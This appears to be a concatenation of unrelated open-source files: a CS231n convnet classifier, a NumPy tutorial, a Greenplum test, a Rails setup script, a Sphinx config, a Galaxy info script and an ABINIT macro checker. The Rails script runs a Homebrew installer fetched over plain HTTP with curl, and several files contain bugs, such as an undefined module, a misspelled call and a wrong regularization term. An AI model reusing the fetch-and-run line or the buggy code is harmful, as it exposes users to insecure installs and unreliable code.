If this is given then we will return one of (loss, gradient) or dX;
If this is not given then we will return either class scores or class
probabilities.
- reg: Scalar value giving the strength of L2 regularization.
- dropout: The probability of keeping a neuron in the dropout layer
Outputs:
This function can return several different things, depending on its inputs
as described above.
If y is None and extract_features is True, returns:
- features: (N, H) array of features, where H is the number of neurons in the
first affine layer.
If y is None and return_probs is True, returns:
- probs: (N, L) array of normalized class probabilities, where probs[i][j]
is the probability that X[i] has label j.
If y is None and return_probs is False, returns:
- scores: (N, L) array of unnormalized class scores, where scores[i][j] is
the score assigned to X[i] having label j.
If y is not None and compute_dX is False, returns:
- (loss, grads) where loss is a scalar value giving the loss and grads is a
dictionary mapping parameter names to arrays giving the gradient of the
loss with respect to each parameter.
If y is not None and compute_dX is True, returns:
- dX: Array of shape (N, C, H, W) giving the gradient of the loss with
respect to the input data.
"""
W1, b1 = model['W1'], model['b1']
W2, b2 = model['W2'], model['b2']
W3, b3 = model['W3'], model['b3']
W4, b4 = model['W4'], model['b4']
W5, b5 = model['W5'], model['b5']
conv_param_1 = {'stride': 1, 'pad': (W1.shape[2] - 1) / 2}
conv_param_2 = {'stride': 1, 'pad': (W2.shape[2] - 1) / 2}
conv_param_3 = {'stride': 1, 'pad': (W3.shape[2] - 1) / 2}
pool_param = {'stride': 2, 'pool_height': 2, 'pool_width': 2}
dropout_param = {'p': dropout}
dropout_param['mode'] = 'test' if y is None else 'train'
a1, cache1 = conv_relu_pool_forward(X, W1, b1, conv_param_1, pool_param)
a2, cache2 = conv_relu_pool_forward(a1, W2, b2, conv_param_2, pool_param)
a3, cache3 = conv_relu_pool_forward(a2, W3, b3, conv_param_3, pool_param)
a4, cache4 = affine_relu_forward(a3, W4, b4)
if extract_features:
return a4.reshape((X.shape[0], 512))
d4, cache5 = dropout_forward(a4, dropout_param)
scores, cache6 = affine_forward(d4, W5, b5)
if y is None:
if return_probs:
probs = np.exp(scores - np.max(scores, axis=1, keepdims=True))
probs /= np.sum(probs, axis=1, keepdims=True)
return probs
else:
return scores
data_loss, dscores = softmax_loss(scores, y)
dd4, dW5, db5 = affine_backward(dscores, cache6)
da4 = dropout_backward(dd4, cache5)
da3, dW4, db4 = affine_relu_backward(da4, cache4)
da2, dW3, db3 = conv_relu_pool_backward(da3, cache3)
da1, dW2, db2 = conv_relu_pool_backward(da2, cache2)
dX, dW1, db1 = conv_relu_pool_backward(da1, cache1)
if compute_dX:
return dX
grads = {
'W1': dW1, 'b1': db1, 'W2': dW2, 'b2': db2,
'W3': dW3, 'b3': db3, 'W4': dW4, 'b4': db4,
'W5': dW5, 'b5': db5,
}
reg_loss = 0.0
for p in ['W1', 'W2', 'W3', 'W4', 'W5']:
W = model[p]
reg_loss += 0.5 * reg * np.sum(W)
grads[p] += reg * W
loss = data_loss + reg_loss
return loss, grads
pass
|
UltronAI/Deep-Learning
|
CS231n/reference/cnn_assignments-master/assignment3/cs231n/classifiers/convnet.py
|
Python
|
mit
| 15,991
|
[
"Gaussian",
"NEURON"
] |
5f1da709a74cf49c572d8a8936bca2e82b14c6146e8f06f017176e97d10c01a5
|
#!/usr/bin/env python
"""
Demonstrate basic usage of the numpy package.
"""
from numpy import *
# create an array a of length n, with zeroes and
# double precision float type:
n = 4
a = zeros(n)
print 'zeros(n):', type(a), type(a[0]), a
a = zeros(n) # becomes array of integers (!)
print 'zeros(n)', type(a), a
p = q = 2
a = zeros((p, q, 3))
print 'zeros((p,q,3))', type(a), a
x = linspace(-5, 5, 11)
print 'linspace(-5, 5, 11)', type(x), type(x[0]), x
# arange is possible but not recommended
x = arange(-5, 5, 1, float)
# note: round-off errors may prevent the last element
# in x from being equal to the upper bound 5
x = arange(-5, 5.1, 1) # ensures that 5 is in x
print 'arange(-5, 5.1, 1)', type(x), type(x[0]), x
# better:
from scitools.numpyutils import seq
x = seq(-5, 5, 1)
print 'seq(-5, 5, 1)', type(x), type(x[0]), x
# it is trivial to make accompanying y values:
y = sin(x/2.0)*3.0
print 'y = sin(x/2.0)*3.0:', type(y), type(y[0]), y
# create a NumPy array of a Python list:
pl = [0, 1.2, 4, -9.1, 5, 8]
a = array(pl)
print 'pl = [0, 1.2, 4, -9.1, 5, 8]; '\
'array(pl)', type(a), a
# from nested Python list to NumPy arrays and back again:
x = [0, 0.5, 1]; y = [-6.1, -2, 1.2] # lists
a = array([x, y]) # form 2x3 array (x and y as rows)
# turn 1st row to Python list and use index to locate an entry:
i = a[0,:].tolist().index(0.5)
print 'locate i as index for 0.5 in a', a, 'i:', i
# initialization from a function:
def myfunc(i, j):
return (i+1)*(j+4-i)
# make 3x6 array where a[i,j] = myfunc(i,j):
a = fromfunction(myfunc, (3,6))
print 'fromfunction(myfunc, (3,6))', a, type(a[0,0])
# make a one-dim. array of length n:
n = 1000000
def myfunc2(i):
return sin(i*0.0001)
print '\ncreating arrays of length %5.0E ... ' % (float(n))
import time; t1 = time.clock()
a = fromfunction(myfunc2, (n,))
t2 = time.clock()
cpu_fromfunction = t2 - t1
# alternative initialization via linspace and sin:
a = linspace(1, n, n+1); a = sin(a*0.0001)
cpu_arange_sin = time.clock() - t2
print 'fromfunction took', cpu_fromfunction, \
's and arange&sin took', cpu_arange_sin, 's for length', n
# indexing:
a = array([0, 1.2, 4, -9.1, 5, 8])
a.shape = (2,3) # turn a into a 2x3 matrix
print a[0,1] # print entry (0,1)
i=1; j=0
a[i,j] = 10 # assignment to entry (i,j)
print a[:,0] # print first column
a[:,:] = 0 # set all elements of a equal to 0
a = linspace(0, 29, 30)
a.shape = (5,6)
print a
print a[1:3,:-1:2] # a[i,j] for i=1,2 and j=0,2,4
print a[::3,2:-1:2] # a[i,j] for i=0,3 and j=2,4
i = slice(None, None, 3); j = slice(2, -1, 2)
print a[i,j]
a = array([0, 1.2, 4, -9.1, 5, 8])
a.shape = (2,3) # turn a into a 2x3 matrix
# traverse array a:
for i in range(a.shape[0]):
for j in range(a.shape[1]):
a[i,j] = (i+1)*(j+1)*(j+2)
print 'a[%d,%d]=%g ' % (i,j,a[i,j]),
print # newline after each row
print a
for e in a:
print e
for e in a.flat:
print e
for index, value in ndenumerate(a):
print index, value
print 'a.shape = (2,3); a=', a
# turn a into a vector of length 6 again
a.shape = (size(a),) # size(a) returns the total no of elements
print 'a.shape = (size(a),); a=', a
# explicit loop vs vectorized operation:
t0 = time.clock()
b = 3*a - 1
t1 = time.clock()
for i in xrange(len(a)):
b[i] = 3*a[i] - 1
t2 = time.clock()
print '3*a-1: vectorized: %g sec, loop: %g sec' % (t1-t0, t2-t1)
# mathematical functions:
b = clip(b, 0.1, 1.0E+20) # throw away entries < 0.1
c = cos(b) # take the cosine of all entries in b
print 'b = 3*a - 1; b = clip(b, 0.1, 1.0E+20); c = cos(b)', b, c
# these functions are available:
c = sin(b)
c = arcsin(c)
c = sinh(b)
# same functions for the cos and tan families
c = b**2.5 # raise all entries to the power of 2.5
c = log(b)
c = exp(b)
c = sqrt(b)
a = arange(0, 20)
random.seed(10) # fix seed
random.shuffle(a) # in-place modification of a
a.shape = 5,4
print a
max_index = a.argmax()
a1d = a.ravel()
print a1d
# [ 7 10 5 6 3 18 13 2 14 8 17 16 19 12 11 1 0 15 4 9]
max_value = a1d[max_index]
print 'max value = %g for index %d' % (max_index, max_value)
# max value 19 for index 12
print a.max(), a.min()
min_index = a.argmin()
print min_index, a.ravel()[min_index]
print a.min()
print a1d
a1d.sort()
print a1d
print sum(a), sum(a1d)
#190 190
a1d = a1d.clip(min=3, max=12)
print a1d
import sys;sys.exit(1)
a = zeros(5)
print 'a:', a
a *= 3.0
print 'a *= 3.0; a=', a
a -= 1.0
print 'a -= 1.0; a=', a
a /= 3.0
print 'a /= 3.0; a=', a
a += 1.0
print 'a += 1.0; a=', a
a **= 2.0
print 'a **= 2.0; a=', a
a = array([0, 1.2, 4, -9.1, 5, 8])
a.shape = (2,3) # turn a into a 2x3 matrix
# indexing as for Python lists:
a = linspace(-1, 1, 6)
a[2:4] = -1 # set a[2] and a[3] to -1
a[-1] = a[0] # set last element equal to first one
print 'a[2:4] = -1; a[-1] = a[0]; a=', a
# multi-dimensional indexing:
a.shape = (3,2)
print 'a.shape = (3,2); a[:,0]',
print a[:,0] # print first column
print 'a[:,1::2]',
print a[:,1::2] # print second column with stride 2
# type testing:
print 'type a:', type(a)
print 'is a ndarray?', isinstance(a, ndarray)
print 'a.dtype.name:', a.dtype.name
print 'a.dtype.char:', a.dtype.char
print 'a.dtype.itemsize:', a.dtype.itemsize
b = zeros(6, float32)
print 'float64 == float32?', a.dtype == b.dtype
c = zeros(2, float)
print 'float64 == float?', a.dtype == c.dtype
# array methods and attributes:
a = zeros(4) + 3
print 'a:', a
b = a.astype(int)
print 'b:', b
print 'a.item(2):', a.item(2) # more efficient than a[2]
# more efficient than a[3]=-4.5:
a.itemset(3,-4.5)
a.shape = (2,2)
print 'a.ravel:', a.ravel()
a[0,1]=-88 # make a non-symmetric
print 'a.transpose():', a.transpose()
# file reading and writing of NumPy arrays:
a = linspace(1, 20, 20)
a.shape = (2,10)
# ASCII format:
file = open('tmp.dat', 'w')
file.write('Here is an array a:\n')
file.write(repr(a))
# array2string has many options for controlling the
# output of an array as a string, but repr() gives a format
# that can be converted back to an array by eval()
file.close()
# load the array from file into b:
file = open('tmp.dat', 'r')
file.readline() # load first comment line
b = eval(file.read())
file.close()
# b is a perfect copy of a:
if not allclose(a, b, atol=1.0E-12, rtol=1.0E-12):
print 'Ooops: b or c are not identical to a; bug in eval(read)...'
else:
print 'eval(file.read()) works'
# binary storage:
a1 = a
a2 = a + 3
import cPickle
file = open('tmp.dat', 'wb')
file.write('This is the array a1:\n')
cPickle.dump(a1, file)
file.write('Here is another array a2:\n')
cPickle.dump(a2, file)
file.close()
file = open('tmp.dat', 'rb')
file.readline() # swallow the initial comment line
b1 = cPickle.load(file)
file.readline() # swallow next comment line
b2 = cPickle.load(file)
file.close()
print 'read from binary (pickled) file: b1=', b1[:2,:2], 'b2=', b2[:2,:2]
# pickling NumPy arrays: see also the module scitools.NumPyDB
# binary format using tostring/fromstring:
file = open('tmp3.dat', 'wb')
a_binary = a.tostring()
# store first length (in bytes)
file.write('%d\n%s\n' % (len(a_binary), str(a.shape)))
file.write(a_binary)
file.close()
file = open('tmp3.dat', 'rb')
# load binary data into b:
nbytes = int(file.readline()) # or eval(file.readline())
b_shape = eval(file.readline())
b = fromstring(file.read(nbytes), float)
b.shape = b_shape
file.close()
print 'read from binary file: b=', b
print '\n\n--------- random numbers -------------\n'
n = 10000 # no of random samples
# native Python support for random numbers:
import random as random_number
random.seed(2198) # control the seed
# uniform and random are inherited from whrandom:
print 'random number on (0,1):', random_number.random()
print 'unform random number on (-1,1):', random_number.uniform(-1,1)
print 'N(0,1) Gaussian random number:', random_number.gauss(0,1)
print 'mean of %d random uniform random numbers:' % n
u = random.random(n) # uniform numbers on (0,1)
print 'on (0,1):', sum(u)/n, '(should be 0.5)'
u = random.uniform(-1,1,n) # uniform numbers on (-1,1)
print 'on (-1,1):', sum(u)/n, '(should be 0)'
# normally distributed numbers:
mean = 0.0; stdev = 1.0
u = random.normal(mean, stdev, n)
m = sum(u)/n # empirical mean
s = sqrt(sum((u - m)**2)/(n-1)) # empirical st.dev.
print 'generated %d N(0,1) samples with\nmean %g '\
'and st.dev. %g using random.normal(0,1,%d)' % (n, m, s, n)
p = sum(u < 1.5)
prob = p/float(n)
print 'probability N(0,1) < 1.5: %.2f' % prob
print '\n\n--------- linear algebra -------------\n'
n = 4
A = zeros((n,n))
x = zeros(n)
b = zeros(n)
for i in range(n):
x[i] = i/2.0 # some prescribed solution
for j in range(n):
A[i,j] = 2.0 + float(i+1)/float(j+i+1)
b = dot(A, x) # matrix-vector product: adjust rhs to fit x
# solve linear system A*y=b:
y = linalg.solve(A, b)
# compare exact x with the y we computed:
if sum(abs(x - y)) < 1.0E-12: print 'correct solution'
else: print 'wrong solution',x,y
# alternative:
if allclose(x, y, atol=1.0E-12, rtol=1.0E-12):
print 'correct solution'
else:
print 'wrong solution', x, y
# test: A times A inverse is the identity matrix:
B = linalg.inv(A)
R = dot(A, B) - eye(n) # residual
R_norm = linalg.norm(R)
print 'Residual R = A*A-inverse - I:', R_norm
d = linalg.det(A)
print 'det(A)=%g' % d
# eigenvalues only:
A_eigenvalues = linalg.eigvals(A)
# eigenvalues and eigenvectors:
A_eigenvalues, A_eigenvectors = linalg.eig(A)
for e, v in zip(A_eigenvalues, A_eigenvectors):
print 'eigenvalue %g has corresponding vector\n%s' % (e, v)
# the * operator is not what we expect from linear algebra:
print 'A:', A
print 'x:', x
print 'b:', b
print 'A*x =', A*x
print 'b*x =', b*x
print 'dot(A,x) =', dot(A,x)
print 'dot(b,x) =', dot(b,x)
# but with matrix/mat, * behaves as in linear algebra:
x1 = array([1, 2, 3], float)
x2 = matrix(x) # or mat(x)
print 'x2:', x2 # row vector
x3 = mat(x).transpose() # column vector
print 'x3:', x3
print 'type(x3):', type(x3)
print 'is x3 a matrix?', isinstance(x3, matrix)
A = eye(3) # identity matrix
A = mat(A)
y2 = x2*A # vector-matrix product
print 'y2:', y2
y3 = A*x3 # matrix-vector product
print 'y3:', y3
# try array*array product:
A = (zeros(9) + 1).reshape(3,3)
y = A*x1 # [A[0,:]*x1, A[1,:]*x1, A[2,:]*x1]
print 'array2D*array1D:', y
B = A + 1
print 'array2D*array2D:', A*B # element-wise product
A = mat(A); B = mat(B)
print 'matrix*matrix:', A*B # matrix-matrix product
# Matlab-style quick generation of arrays:
a = r_[-5:5:1] # same as arange(-1, 1, 0.2)
print a
a = r_[-5:5:11j] # same as linspace(-1, 1, 11)
print a
# stack three arrays together in a 3x2 array:
c1 = zeros(2)+2; c2 = zeros(2)-2; c3 = zeros(2)
a = r_[c1,c2,c3]
print a
# vectorization:
def somefunc(x):
"""Scalar function."""
if x < 0:
return 0
else:
return sin(x)
# auto vectorization through numpy.vectorize:
import numpy
somefuncv = numpy.vectorize(somefunc, otypes='d')
somefuncv.__name__ = "vectorize(somefunc)"
def somefunc_NumPy(x):
r = x.copy()
for i in xrange(size(x)):
if x.flat[i] < 0: # x.flat views x as one-dimensional
r[i] = 0.0
else:
r[i] = sin(x[i])
r.shape = x.shape
return r
def somefunc_NumPy2(x):
"""Vectorized version of somefunc."""
r1 = zeros(len(x), float)
r2 = sin(x)
return where(x < 0, r1, r2)
def somefunc_NumPy2b(x):
"""Vectorized version of somefunc."""
return where(x < 0, 0.0, sin(x))
def somefunc_NumPy3(x):
b = (x > zeros(len(x), float))
return sin(x)*b
def somefunc_NumPy_log(x):
r = zeros(len(x), float)
for i in range(len(x)):
if x[i] <= 0:
r[i] = 0.0
else:
r[i] = log(x[i])
return r
def somefunc_NumPy_logv(x):
x_pos = where(x > 0, x, 1)
r1 = log(x_pos)
r = where(x < 0, 0.0, r1)
return r
somefunc_list = [somefuncv, somefunc_NumPy, somefunc_NumPy2,
somefunc_NumPy2b, somefunc_NumPy3,
somefunc_NumPy_log, somefunc_NumPy_logv]
# check correctness:
x = sequence(-2, 2, 2)
print '\nsomefunc_* functions applied to', x
for f in somefunc_list:
print f(x)
n = 5000000
#n = 500000
x = linspace(0, 2, n+1)
print '\nperforming some timings of "somefunc*" implementations...'
from scitools.EfficiencyTable import EfficiencyTable as ET
from scitools.misc import timer
e = ET('vectorization of "somefunc" functions with an if test, n=%d' % n)
for f in somefunc_list[:-2]: # skip the last two log functions
t = timer(f, (x,), repetitions=1)
e.add(f.__name__, t)
print e
print 'end of', sys.argv[0]
|
sniemi/SamPy
|
sandbox/src1/TCSE3-3rd-examples/src/py/intro/NumPy_basics.py
|
Python
|
bsd-2-clause
| 12,819
|
[
"Gaussian"
] |
abda0e4fae4284aa8c7176bc2a44b0d240423b8a78e2c48818db938857d84326
|
"""
Copyright (C) 2004-2015 Pivotal Software, Inc. All rights reserved.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mpp.gpdb.tests.storage.lib.sql_isolation_testcase import SQLIsolationTestCase
from mpp.lib.PSQL import PSQL
from mpp.gpdb.tests.storage.lib.uao_udf import create_uao_udf
class UAOFunctionsTestCase(SQLIsolationTestCase):
"""
@tags ORCA
"""
'''
Test for support user-defined functions on updatable AO tables.
This test suite uses the isolation test case because of the possibility
to easily access the utility mode.
'''
sql_dir = 'sql/'
ans_dir = 'expected'
out_dir = 'output/'
@classmethod
def setUpClass(cls):
super(UAOFunctionsTestCase, cls).setUpClass()
create_uao_udf()
def get_ans_suffix(self):
primary_segments_count = PSQL.run_sql_command(
"select 'primary_segment' from gp_segment_configuration where content >= 0 and \
role = 'p'").count('primary_segment') - 1
if primary_segments_count > 1:
return "%sseg" % primary_segments_count
else:
return None
|
CraigHarris/gpdb
|
src/test/tinc/tincrepo/mpp/gpdb/tests/storage/uao/uao_udf/test_uao_udf.py
|
Python
|
apache-2.0
| 1,688
|
[
"ORCA"
] |
34f154a75382ad382c3d8a6e38903807a2693e4c28206afcb816af3169f40b7b
|
from os import system
# Exciting stuff!
def linux():
apt("build-essential")
apt("git-core")
apt("ruby")
apt("ruby1.8-dev")
apt("irb")
apt("sqlite3")
apt("libxslt-dev")
apt("libxslt-ruby")
apt("rubygems")
both()
def mac():
mac_check_install_homebrew()
both()
def both():
gem("rails")
gem("sqlite3-ruby")
gem("mongrel")
gem("nokogiri")
# Boring stuff.
def main():
if os.uname()[0] is "Linux":
linux()
if os.uname()[0] is "Darwin":
mac()
if os.uname()[0] is "Windows":
print "Windows is not currently supported."
print "Have you accepted Linus Torvalds as your personal Lord and Saviour yet?"
def apt(package):
system("sudo aptitude install ", package)
def brew(package):
if package is "mercurial":
system("brew install python")
system("brew install pip")
system("pip install mercurial")
else:
system("brew install ", package)
def gem(pkg):
system("sudo gem install ", pkg, " --no-ri --no-rdoc")
def mac_check_install_homebrew():
print "Checking to see if you have Homebrew installed"
if sytem("brew -v") == 0:
print "Yup, you've got Homebrew installed"
else:
print "You haven't got Homebrew installed. We'll just install that."
system("ruby -e \"$(curl -fsS http://gist.github.com/raw/323731/install_homebrew.rb)\"")
print "...Phew. That was a lot of work!"
print "You should now have Homebrew. Follow the instuctions above,"
print "then rerun this setup script. ;-)"
if __name__ == "main":
main()
|
geeksoflondon/grid4rails
|
doc/setup.py
|
Python
|
agpl-3.0
| 1,623
|
[
"exciting"
] |
acdb3c610eee04641a34983be43d9ade51ef6c23489473cf011458bfbc65af38
|
# -*- coding: utf-8 -*-
#
# io3d documentation build configuration file, created by
# sphinx-quickstart on Mon Nov 27 12:01:57 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath("../"))
# mock
import mock
MOCK_MODULES = [
"numpy",
"scipy",
"matplotlib",
"matplotlib.pyplot",
"matplotlib.widgets",
"scipy.io",
"yaml",
"pydicom",
# 'scipy.interpolate', 'scipy.ndimage', 'pycut', 'io3d', 'sed3', 'pysegbase',
# 'pysegbase.pycut', 'sklearn', 'skimage', 'dicom', 'vtk', 'vtk.util',
# 'larcc', 'larcc.VIEW', 'larcc.MKPOL', 'larcc.AA', 'larcc.INTERVALS',
# 'larcc.MAP',
"PyQt5",
"PyQt5.QtCore",
"PyQt5.QtGui", #'web', 'lar2psm',
# 'scipy.ndimage.measurements', 'lar', 'extern.lar', 'splines',
# 'scipy.sparse', 'skimage.filter', 'mapper', 'skelet3d', 'numpy.core',
# 'skimage.filters', 'skimage.restoration','skimage.io',
# 'gzip', 'cPickle',
# 'lbpLibrary', 'skimage.exposure', 'PyQt4.QVTKRenderWindowInteractor',
# 'matplotlib.backends', 'matplotlib.backends.backend_qt4agg', 'numpy.linalg',
# 'PyQt4.Qt', 'matplotlib.figure', 'skimage.morphology', 'gtk',
# 'pysegbase.seed_editor_qt', 'vtk.qt4', 'vtk.qt4.QVTKRenderWindowInteractor',
# 'seg2fem', 'skimage.segmentation', 'skimage.transform', 'matplotlib.patches', 'skimage.feature',
# 'scipy.ndimage.morphology', 'mpl_toolkits', 'mpl_toolkits.mplot3d',
# 'scipy.ndimage.measurement', 'scipy.ndimage.interpolation',
# 'matplotlib.backends.backend_gtkagg', 'cv2', 'skimage.measure', 'dicom2fem',
# 'morphsnakes', 'scipy.ndimage.filters', 'scipy.signal', 'pandas',
# 'scipy.stats', 'io3d.misc', 'lisa.extern.lar', 'scipy.cluster',
# 'scipy.cluster.vq', 'scipy.cluster.vq',
# 'ipdb', 'multipolyfit', 'PIL', 'yaml',
"SimpleITK",
# 'six', 'nearpy', 'SimpleITK', 'lar', 'pandas'
"ruamel.yaml.YAML",
]
#
for mod_name in MOCK_MODULES:
sys.modules[mod_name] = mock.Mock()
# import sklearn
# sklearn.__version__ = '0.0'
# import scipy
# scipy.__version__ = '0.0'
# import pysegbase.pycut
# pysegbase.pycut.methods = ['graphcut']
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.todo",
"sphinx.ext.viewcode",
"sphinx.ext.coverage",
"sphinx.ext.imgmath",
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
source_suffix = [".rst", ".md"]
# source_suffix = '.rst'
# The master toctree document.
master_doc = "index"
# General information about the project.
project = u"io3d"
copyright = u"2017, Miroslav Jirik"
author = u"Miroslav Jirik"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u"1.2.3"
# The full version, including alpha/beta/rc tags.
release = u"1.2.3"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "alabaster"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# This is required for the alabaster theme
# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars
html_sidebars = {
"**": [
"relations.html", # needs 'show_related': True theme option to display
"searchbox.html",
]
}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "io3ddoc"
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, "io3d.tex", u"io3d Documentation", u"Miroslav Jirik", "manual")
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, "io3d", u"io3d Documentation", [author], 1)]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"io3d",
u"io3d Documentation",
author,
"io3d",
"One line description of project.",
"Miscellaneous",
)
]
|
mjirik/io3d
|
docs/conf.py
|
Python
|
mit
| 7,122
|
[
"VTK"
] |
69cc1ea1ef0eb9dbab78fcf8b0488af53f66500fe09c82a0c16c74309ace200a
|
#! /usr/bin/env python
"""
This script aims to list informations on a given Galaxy instance.
"""
########### Import ###########
import os
import argparse
import sys
from bioblend import galaxy
########### Constant(s) ###########
MOTIF = "toolshed"
########### Function(s) ###########
def list_toolsheds_from_gi(gi):
"""
Print the list of different toolsheds used for installation
on the Galaxy server
"""
dico_toolsheds = {}
for tool in gi.tools.get_tools():
if MOTIF in tool['id']:
elements = tool['id'].split('/')
# Save information in a dictionnary
if not elements[0] in dico_toolsheds.keys():
dico_toolsheds[elements[0]] = 1
print ("\n----- Names of toolsheds used on " + gi.base_url)
for toolshed in dico_toolsheds.keys():
print (" --> " + toolshed)
def list_owners_from_gi(gi):
"""
Print the list of different owners of tools installed
from toolshed(s) on the Galaxy server
"""
dico_owners = {}
for tool in gi.tools.get_tools():
if MOTIF in tool['id']:
elements = tool['id'].split('/')
# Save information in a dictionnary
if not elements[2] in dico_owners.keys():
dico_owners[elements[2]] = 0
dico_owners[elements[2]] += 1
print ("\n----- Names of owners from toolsheds used on " + gi.base_url)
for owner in dico_owners.keys():
print (" --> " + owner + ": " + str(dico_owners[owner]) + " tool(s)")
def list_tools_number(gi):
"""
Print number of tools from the Galaxy instance
"""
cpt_all = 0
cpt_toolshed = 0
for tool in gi.tools.get_tools():
cpt_all += 1
if MOTIF in tool['id']:
cpt_toolshed += 1
print ("\n----- Number of tools on " + gi.base_url)
print ("Total number of tools: " + str(cpt_all) + ".")
print ("Number of tools installed from a toolshed: " + str(cpt_toolshed) + ".")
########### Main ###########
if __name__ == "__main__":
## Parse arguments
parser = argparse.ArgumentParser(description='List information about a Galaxy server')
parser.add_argument('-g', '--galaxy', help='Galaxy server URL', required=True)
parser.add_argument('-k', '--api_key', help='API key from Galaxy', required=True)
parser.add_argument('-t', '--toolsheds', help='List toolsheds from which tools were installed',
action='store_true')
parser.add_argument('-n', '--numbers', help='List numbers of tools installed on the galaxy server \
(with the number coming from toolshed(s))', action='store_true')
parser.add_argument('-o', '--owners', help='List owners of tools coming from toolshed(s) installed \
on the galaxy server', action='store_true')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
galaxy_site = args.galaxy
api_key = args.api_key
list_toolsheds = args.toolsheds
list_owners = args.owners
list_numbers = args.numbers
# ---------------------------------------------------------------------
gi = galaxy.GalaxyInstance(galaxy_site, api_key)
if (list_numbers):
list_tools_number(gi)
if (list_toolsheds):
list_toolsheds_from_gi(gi)
if (list_owners):
list_owners_from_gi(gi)
|
khillion/galaxyxml-analysis
|
galaxyxml_analysis/get_galaxy_info.py
|
Python
|
mit
| 3,410
|
[
"Galaxy"
] |
04a6149556dce3dfc84e1fe024016c0a99ada69d82ca2ee05d4866eb425a108f
|
#!/usr/bin/env python
"""Search for inlined CPP macros in ABINIT src files"""
__author__ = "M. Giantomassi"
import os
import re
import sys
# Files that will be checked.
re_srcfile = re.compile("\.([Ff]|[Ff]90|finc)$")
def is_srcfile(dirpath, fname):
return re_srcfile.search(fname)
# List of macros that should not be inlined with if statements or other instructions.
# These macros are defined in src/incs/abi_common.h
#
MACRO_NAMES = [
"ABI_ALLOCATE",
"ABI_DEALLOCATE",
"ABI_DATATYPE_ALLOCATE",
"ABI_DATATYPE_DEALLOCATE",
"ABI_MALLOC",
"ABI_FREE",
"ABI_CHECK_ALLOC",
]
# Regular expressions for each macro.
regexps = dict()
for name in MACRO_NAMES:
regexps[name] = re.compile(name + " ?\(.*\)")
#regexps[name] = re.compile(name + "\(.*\)") blanks between macro name and () are not permitted
def wrong_string(string):
"Return an empty string if input string does not contain inlined macros."
string = string.strip()
for macro_name in MACRO_NAMES:
pattern = regexps[macro_name]
if macro_name in string and not string.startswith("!"):
s = re.sub(pattern, "", string, count=0).strip()
if not s.startswith("!"): return s
else:
return ""
def abinit_test_generator():
def test_func(abenv):
"""Search for inlined CPP macros in ABINIT src files"""
top = abenv.apath_of("src")
try:
return main(top)
except Exception:
import sys
raise sys.exc_info()[1] # Reraise current exception (py2.4 compliant)
return {"test_func" : test_func}
def main(top):
exit_status = 0
for dirpath, dirnames, files in os.walk(top):
for src in files:
if is_srcfile(dirpath, src):
fpath = os.path.join(dirpath,src)
for lno, line in enumerate(file(fpath)):
#
s = wrong_string(line)
if s:
print "(INLINED MACRO at %s:%d): %s " % (src, lno+1, line)
exit_status += 1
if exit_status > 0:
err_msg = """
Please, avoid instructions like:
if (allocated(arr)) ABI_DEALLOCATE(arr)
When the code is compiled in profile mode, indeed, ABI_DEALLOCATE expands to
the set of Fortran instructions:
deallocate(arr)
call memocc_abi()
These instructions MUST be placed inside an "if then" "end if" block.
This limitation can be lifted, but we need support at the level of the build system.
For the time being, one has to use the more verbose form:
if (allocated(arr)) then
ABI_DEALLOCATE(arr)
end if
This is the list of macros that cannot be inlined:
%(MACRO_NAMES)s
""" % globals()
print err_msg
return exit_status
if __name__ == "__main__":
if len(sys.argv) == 1:
top = "../../../src"
print "-------------------------------------------------------"
